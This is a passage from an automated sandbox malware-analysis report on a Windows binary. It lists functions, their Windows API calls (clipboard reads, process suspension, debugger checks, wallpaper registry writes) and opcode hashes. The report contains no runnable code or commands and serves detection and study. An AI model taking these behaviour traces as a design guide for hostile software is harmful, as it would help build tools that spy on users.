                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                  • API String ID: 4127273184-3576401099
                                                  • Opcode ID: c75f0c149e5ba73f7fcce6e5d535fa58e0d6b88a56a7ba07c2d3bac10c61bf9e
                                                  • Instruction ID: 1d4fccf664b116fd7e9026c1daa93839c24cbfeedf45b0e65449f5778d70c30d
                                                  • Opcode Fuzzy Hash: c75f0c149e5ba73f7fcce6e5d535fa58e0d6b88a56a7ba07c2d3bac10c61bf9e
                                                  • Instruction Fuzzy Hash: DBF0C272BC421022D82931B96DAFBFE18058742F61F15412BF302652CAD4CE6A81428F
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00451E3A
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451F7B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                  • String ID:
                                                  • API String ID: 4212172061-0
                                                  • Opcode ID: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                  • Opcode Fuzzy Hash: 715b93ef3f017ee4fea0110e94a068843382a27aff4af5d2daf4b4fdd25eb79d
                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                  APIs
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • GetTimeZoneInformation.KERNEL32 ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                  • String ID:
                                                  • API String ID: 806657224-0
                                                  • Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                  • Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
                                                  • Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                  • Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  • Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                  • Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                  • CloseClipboard.USER32 ref: 0040B760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                  • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                  • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                  • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                  • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                  • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                  • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                  • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                  • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                  • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                  • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                  • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                  • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                  • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                  • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                  • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                  • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                  • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                  • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                  • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
